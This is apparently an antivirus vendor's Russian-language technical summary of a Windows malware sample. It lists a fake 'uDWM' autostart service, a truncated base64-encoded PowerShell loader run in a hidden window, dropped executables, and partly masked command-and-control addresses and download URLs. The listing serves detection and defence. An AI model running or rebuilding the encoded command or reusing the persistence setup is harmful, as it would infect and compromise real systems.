Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\uDWM] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\uDWM] 'ImagePath' = '"<SYSTEM32>\wscproxystub\uDWM.exe"'
- 'uDWM' "<SYSTEM32>\wscproxystub\uDWM.exe"
- 'uDWM' <SYSTEM32>\wscproxystub\uDWM.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAG8AYgBhAHUANABwAD0AKAAnAEsAbgAnACsAKAAnADUAZAAnACsAJwA2AGQAYQAnACkAKQA7ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUATgBWADoAVABlAG0AcABcAHcATwBSAGQAXAAyADAAMQA5AFwAIAAtAG...
- %TEMP%\word\2019\u4cjf5lx.exe
- <SYSTEM32>\wscproxystub\udwm.exe
- %TEMP%\word\2019\u4cjf5lx.exe в <SYSTEM32>\wscproxystub\udwm.exe
- '82.##9.200.118':80
- '18#.#1.158.15':8080
- http://ka###-sd.com/admin/nlYFI/
- http://ki###1tours.com/pdf/lwuqKsRgijhXw/
- http://18#.##.158.15:8080/NgT9fwdvpUBJB/JRkNImY7vDEe9/ via 18#.#1.158.15
- DNS ASK ka###-sd.com
- DNS ASK ki###1tours.com
- '%TEMP%\word\2019\u4cjf5lx.exe'
- '<SYSTEM32>\wscproxystub\udwm.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAG8AYgBhAHUANABwAD0AKAAnAEsAbgAnACsAKAAnADUAZAAnACsAJwA2AGQAYQAnACkAKQA7ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUATgBWADoAVABlAG0AcABcAHcATwBSAGQAXAAyADAAMQA5AFwAIAAtAG...' (со скрытым окном)